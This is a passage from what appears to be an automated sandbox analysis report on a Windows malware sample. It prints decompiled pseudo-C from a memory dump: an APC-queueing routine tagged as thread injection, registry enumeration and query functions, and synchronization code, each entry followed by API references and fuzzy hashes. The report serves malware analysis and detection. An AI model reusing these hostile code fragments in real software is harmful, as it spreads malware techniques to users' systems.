                            • CloseHandle.KERNEL32(00000000,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14C40
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 73268831-0
                            • Opcode ID: cd3b7ae6289d0fb6640c94f609b1a8fb474f3599b086b501a40a75b020f38cec
                            • Instruction ID: 650b7bcafe3fa4cb26d1b6f358d2ef2b92cea4fc52499ea1855fa5dabeb84b24
                            • Opcode Fuzzy Hash: cd3b7ae6289d0fb6640c94f609b1a8fb474f3599b086b501a40a75b020f38cec
                            • Instruction Fuzzy Hash: 29214672E413559BC7319F689C44ADB73A9EBC8730B160224FD16D7100DB75EC81A6D4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F12EBD, Relevance: 7.5, APIs: 5, Instructions: 49threadinjectionCOMMON
                            Download Yara Rule
                            C-Code - Quality: 49%
                            			E00F12EBD(void* __ecx, void* __edi, intOrPtr _a4) {
				unsigned int _v8;
				void* _v12;
				long _t15;
				long _t16;
				signed int _t18;
				signed int _t19;
				unsigned int _t21;
				unsigned int _t26;

				asm("stosd");
				_v12 = _v12 | 0xffffffff;
				while(1) {
					_t15 = QueueUserAPC(E00F1293E, GetCurrentThread(),  &_v12); // executed
					if(_t15 == 0) {
						break;
					}
					_t26 = _v8;
					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
					_push(0);
					_push(0x13);
					_push(_t26 >> 5);
					_push(_t18);
					L00F1B18E();
					_push(1);
					_t19 = 3;
					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
					_t16 = E00F154DF(_a4, (_t21 >> 6) + _t18);
					if(_t16 == 1) {
						continue;
					} else {
					}
					L5:
					return _t16;
				}
				_t16 = GetLastError();
				goto L5;
			}











                            0x00f12ec8
                            0x00f12ec9
                            0x00f12ecf
                            0x00f12edf
                            0x00f12ee7
                            0x00000000
                            0x00000000
                            0x00f12eec
                            0x00f12eef
                            0x00f12ef3
                            0x00f12ef5
                            0x00f12efa
                            0x00f12efb
                            0x00f12efc
                            0x00f12f03
                            0x00f12f09
                            0x00f12f10
                            0x00f12f1f
                            0x00f12f27
                            0x00000000
                            0x00000000
                            0x00f12f29
                            0x00f12f31
                            0x00f12f33
                            0x00f12f33
                            0x00f12f2b
                            0x00000000

                            APIs
                            • GetCurrentThread.KERNEL32 ref: 00F12ED3
                            • QueueUserAPC.KERNEL32(00F1293E,00000000,?,?,?,00F12348,?,?), ref: 00F12EDF
                            • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 00F12EFC
                            • SleepEx.KERNEL32(00000003,00000001,?,?,?,00F12348,?,?), ref: 00F12F10
                              • Part of subcall function 00F154DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 00F1553E
                            • GetLastError.KERNEL32(?,?,?,00F12348,?,?), ref: 00F12F2B
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                            • String ID:
                            • API String ID: 2952296216-0
                            • Opcode ID: 124c982a506e2bf677afe143a78381f8ab078fb7a62c295a54e57e52073792a2
                            • Instruction ID: b267f859263ceec398272970fda82118b478bd7b048d65c53ad97b9e424ac6ab
                            • Opcode Fuzzy Hash: 124c982a506e2bf677afe143a78381f8ab078fb7a62c295a54e57e52073792a2
                            • Instruction Fuzzy Hash: 7801DBB2A40108FBD7149BE4DC5EFEE767CD744760F114114F602D61C0E6B0DA41E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14788, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E00F14788(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0xf1d130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E00F155DC(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xf1d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00F16DFA(_v20);
											if(_v8 == 0) {
												_t54 = E00F144E4(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00F1301A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                            0x00f14789
                            0x00f1478f
                            0x00f1479a
                            0x00f1479a
                            0x00f1479c
                            0x00f18a1b
                            0x00f18a1e
                            0x00f18a27
                            0x00f18a2a
                            0x00f18a2d
                            0x00f18a35
                            0x00f18b33
                            0x00f18b3e
                            0x00f18b41
                            0x00f18b43
                            0x00000000
                            0x00f18b43
                            0x00f18a3b
                            0x00f18a3e
                            0x00f18b46
                            0x00f18b46
                            0x00f18a44
                            0x00f18a4b
                            0x00f18a53
                            0x00f18b2a
                            0x00f18a59
                            0x00f18a5f
                            0x00f18a66
                            0x00f18a69
                            0x00f18b18
                            0x00f18a6f
                            0x00000000
                            0x00f18a6f
                            0x00f18a6f
                            0x00f18a6f
                            0x00f18a6f
                            0x00f18a74
                            0x00f18a76
                            0x00f18a76
                            0x00f18a83
                            0x00f18a8b
                            0x00000000
                            0x00000000
                            0x00f18a8d
                            0x00f18a9a
                            0x00f18aa0
                            0x00f18aa0
                            0x00f18aa3
                            0x00000000
                            0x00000000
                            0x00f18aa5
                            0x00f18ab0
                            0x00f18ac4
                            0x00f18afa
                            0x00f18ac6
                            0x00f18ac6
                            0x00f18acd
                            0x00f18ad5
                            0x00000000
                            0x00f18ad7
                            0x00f18ad7
                            0x00f18ae2
                            0x00f18ae5
                            0x00f18aec
                            0x00000000
                            0x00f18aec
                            0x00f18ae5
                            0x00f18ad5
                            0x00f18afd
                            0x00f18b00
                            0x00f18b08
                            0x00f18b0e
                            0x00f18b13
                            0x00f18b13
                            0x00000000
                            0x00f18b08
                            0x00f18aad
                            0x00000000
                            0x00f18aef
                            0x00f18aef
                            0x00000000
                            0x00f18af8
                            0x00f18b1f
                            0x00f18b1f
                            0x00f18b25
                            0x00f18b25
                            0x00f18a53
                            0x00f18a3e
                            0x00f18b50
                            0x00f14791
                            0x00f14791
                            0x00f14798
                            0x00f147a3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f14798

                            APIs
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75145520,00F1654E,?,?), ref: 00F18AB7
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,75145520,00F1654E,?,?,?), ref: 00F18AD7
                              • Part of subcall function 00F1301A: wcstombs.NTDLL ref: 00F130DA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastObjectSingleWaitwcstombs
                            • String ID:
                            • API String ID: 2344289193-0
                            • Opcode ID: 23fe5e130bdc08a8ae8396112eea8b48b579c6ec0731b894b54761e6b086554d
                            • Instruction ID: 9449de4d337f3681b34d3d9c222a8fe26b03842498d7ea3743958a56d8b133c2
                            • Opcode Fuzzy Hash: 23fe5e130bdc08a8ae8396112eea8b48b579c6ec0731b894b54761e6b086554d
                            • Instruction Fuzzy Hash: A341F9B1D00209EFDF10DFA5DA845EEBBB9FF58395B20846AE502E7150DB349E81AB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16A4D, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 00F16AA4
                            • SysAllocString.OLEAUT32(00F14993), ref: 00F16AE7
                            • SysFreeString.OLEAUT32(00000000), ref: 00F16AFB
                            • SysFreeString.OLEAUT32(00000000), ref: 00F16B09
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: af038af15557a1d9d8a33792e9a1f136b167255e0e984368fe94c7e7fc5039bb
                            • Instruction ID: 454f0fd92153d80296cafe8602b4759d2dcc840bf83adedd83435d91367df187
                            • Opcode Fuzzy Hash: af038af15557a1d9d8a33792e9a1f136b167255e0e984368fe94c7e7fc5039bb
                            • Instruction Fuzzy Hash: 1E310C72904149EFCB05DF98D8C48EEBBB9FF48350B11842EE90AE7210D7759985DFA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1A614, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F1A614(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00F155DC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00F16DFA(_v28);
							goto L17;
						}
						_t42 = E00F148E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00F16DFA(_v24);
						_v20 = _v16;
						_t47 = E00F155DC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xf1d2a4, 0) == 0x102);
				goto L16;
			}

















                            0x00f1a614
                            0x00f1a62e
                            0x00f1a631
                            0x00f1a634
                            0x00f1a637
                            0x00f1a63a
                            0x00f1a640
                            0x00f1a644
                            0x00f1a71e
                            0x00f1a722
                            0x00f1a722
                            0x00f1a64d
                            0x00f1a654
                            0x00f1a65b
                            0x00f1a65e
                            0x00f1a713
                            0x00f1a716
                            0x00000000
                            0x00f1a71c
                            0x00f1a664
                            0x00f1a667
                            0x00f1a66e
                            0x00f1a678
                            0x00f1a681
                            0x00f1a687
                            0x00f1a68f
                            0x00f1a6c7
                            0x00f1a701
                            0x00f1a707
                            0x00f1a709
                            0x00f1a709
                            0x00f1a70b
                            0x00f1a70e
                            0x00000000
                            0x00f1a70e
                            0x00f1a6dc
                            0x00f1a6e1
                            0x00f1a6e5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1a6e5
                            0x00f1a694
                            0x00f1a6a3
                            0x00000000
                            0x00000000
                            0x00f1a6a8
                            0x00f1a6b1
                            0x00f1a6b4
                            0x00f1a6bb
                            0x00f1a6be
                            0x00f1a699
                            0x00f1a699
                            0x00000000
                            0x00f1a699
                            0x00f1a6c2
                            0x00000000
                            0x00f1a6c2
                            0x00f1a696
                            0x00000000
                            0x00f1a6e7
                            0x00f1a6f4
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A63A
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • RegEnumKeyExA.KERNEL32(?,?,?,00F16096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F16096), ref: 00F1A681
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,00F16096,?,00F16096,?,?,?,?,?,00F16096,?), ref: 00F1A6EE
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A716
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID:
                            • API String ID: 3664505660-0
                            • Opcode ID: a567d226bd86ec7e37ed5c8fcf431926c6e7bc5adff05622ab4b21488fec7bf9
                            • Instruction ID: 22641f0926057ce644404695a0d408d835d72fd9199b00182233d90bd63271e4
                            • Opcode Fuzzy Hash: a567d226bd86ec7e37ed5c8fcf431926c6e7bc5adff05622ab4b21488fec7bf9
                            • Instruction Fuzzy Hash: 08313872C00119EBCF21AFA5DC849EEFBB9FB98310F204066E911B2160D6754E91EB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16006, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 41%
                            			E00F16006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00F12E2E(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00F1A2A1(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00F15EF5(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xf1d2e4, 1, 0,  *0xf1d374);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00F1A614(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00F148E5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00F17424(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00F14B5B( &_v32, _t39);
					goto L13;
				}
			}














                            0x00f16006
                            0x00f16013
                            0x00f16019
                            0x00f1601a
                            0x00f1601b
                            0x00f1601c
                            0x00f1601d
                            0x00f16021
                            0x00f16028
                            0x00f1602d
                            0x00f16031
                            0x00f160b9
                            0x00f160b9
                            0x00f160bc
                            0x00f160be
                            0x00f160c6
                            0x00f160cc
                            0x00f160cf
                            0x00f160cf
                            0x00f160cc
                            0x00f160da
                            0x00f160da
                            0x00f1603d
                            0x00f16044
                            0x00f16046
                            0x00f16046
                            0x00f1605d
                            0x00f16061
                            0x00f16064
                            0x00f1606f
                            0x00f16076
                            0x00f16076
                            0x00f16082
                            0x00f16083
                            0x00f16091
                            0x00f16085
                            0x00f16085
                            0x00f16086
                            0x00f16087
                            0x00f16088
                            0x00f16089
                            0x00f1608a
                            0x00f1608a
                            0x00f16096
                            0x00f1609b
                            0x00f1609d
                            0x00f1609f
                            0x00f1609f
                            0x00f160a6
                            0x00000000
                            0x00f160a8
                            0x00f160a8
                            0x00f160b5
                            0x00000000
                            0x00f160b5

                            APIs
                            • CreateEventA.KERNEL32(00F1D2E4,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 00F16057
                            • SetEvent.KERNEL32(00000000), ref: 00F16064
                            • Sleep.KERNEL32(00000BB8), ref: 00F1606F
                            • CloseHandle.KERNEL32(00000000), ref: 00F16076
                              • Part of subcall function 00F1A614: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A63A
                              • Part of subcall function 00F1A614: RegEnumKeyExA.KERNEL32(?,?,?,00F16096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00F16096), ref: 00F1A681
                              • Part of subcall function 00F1A614: WaitForSingleObject.KERNEL32(00000000,?,?,?,00F16096,?,00F16096,?,?,?,?,?,00F16096,?), ref: 00F1A6EE
                              • Part of subcall function 00F1A614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00F16096,?), ref: 00F1A716
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 891522397-0
                            • Opcode ID: 2e884472c5725051ce10bf82c9b798314dca4a8b1b21a50d61fdc665b4c76c72
                            • Instruction ID: 8f49c17b66312415c14ac3089347da5896018d786b0f35f1d420ad9a5b0099d5
                            • Opcode Fuzzy Hash: 2e884472c5725051ce10bf82c9b798314dca4a8b1b21a50d61fdc665b4c76c72
                            • Instruction Fuzzy Hash: 77219873D00219EBCF20AFE58C858DE7779AB4C360B064529F611E7100D735DD85ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15607, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F15607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00F155DC(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00F16DFA(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00F18FEC(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                            0x00f15613
                            0x00f15636
                            0x00f15640
                            0x00f15646
                            0x00f1564a
                            0x00f15662
                            0x00f15667
                            0x00f156af
                            0x00f15669
                            0x00f15671
                            0x00f15675
                            0x00f156ac
                            0x00f15677
                            0x00f15689
                            0x00f1568d
                            0x00f156a3
                            0x00f1568f
                            0x00f15692
                            0x00f15694
                            0x00f15699
                            0x00f1569e
                            0x00f1569e
                            0x00f15699
                            0x00f1568d
                            0x00f15675
                            0x00f156b7
                            0x00f156b7
                            0x00f156be
                            0x00f156c4
                            0x00f156c4
                            0x00f1562c
                            0x00f15630
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00F15640
                            • RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00000000,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?,80000002), ref: 00F15662
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,80000002,00000000,00000000,00000000,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?), ref: 00F15687
                            • RegCloseKey.ADVAPI32(?,?,00F149C4,3D00F1C0,80000002,00F16096,00000000,00F16096,?,?,80000002,00000000,?), ref: 00F156B7
                              • Part of subcall function 00F18FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 00F19071
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: 7806968c1103ceff165d0025a678ec4909e46ddf776f87ecbf3a86f5ab5bd5ab
                            • Instruction ID: 8bd01e63e9ec30c046bfa42dbbcf623b2981dc411b30d44071a9ef733a8632cf
                            • Opcode Fuzzy Hash: 7806968c1103ceff165d0025a678ec4909e46ddf776f87ecbf3a86f5ab5bd5ab
                            • Instruction Fuzzy Hash: 6A21F87350055DEFCF11AF94DC80CEE7B6AEB587A0B458026FE159B120D6319DA1ABD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F13A19, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E00F13A19(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xf1d35c; // 0x57f95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xf1d35c; // 0x57f95b0
					if( *((intOrPtr*)(_t6 + 0x58)) == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xf1d030) {
					HeapFree( *0xf1d270, 0, _t8);
				}
				_t9 = E00F1311C(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xf1d35c; // 0x57f95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                            0x00f13a19
                            0x00f13a19
                            0x00f13a22
                            0x00f13a32
                            0x00f13a32
                            0x00f13a3c
                            0x00000000
                            0x00000000
                            0x00f13a2c
                            0x00f13a2c
                            0x00f13a3e
                            0x00f13a42
                            0x00f13a54
                            0x00f13a54
                            0x00f13a5f
                            0x00f13a64
                            0x00f13a67
                            0x00f13a6c
                            0x00f13a70
                            0x00f13a76

                            APIs
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F13A22
                            • Sleep.KERNEL32(0000000A), ref: 00F13A2C
                            • HeapFree.KERNEL32(00000000,?), ref: 00F13A54
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F13A70
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 0c133cc6f990a809986637e8e02a7790d4f079cd4f825a211c1bedf00d74095d
                            • Instruction ID: 470754adde9c66c204b75344bbfd8fe1f13c04275ba172c7e75279787322950c
                            • Opcode Fuzzy Hash: 0c133cc6f990a809986637e8e02a7790d4f079cd4f825a211c1bedf00d74095d
                            • Instruction Fuzzy Hash: C6F05874640248EFEB20CB69EC48BD63BB4AF15340B0AC004F582C6261D634D980FF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1301A, Relevance: 4.6, APIs: 3, Instructions: 96COMMON
                            Download Yara Rule
                            C-Code - Quality: 18%
                            			E00F1301A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x6ff6fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00F155DC(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
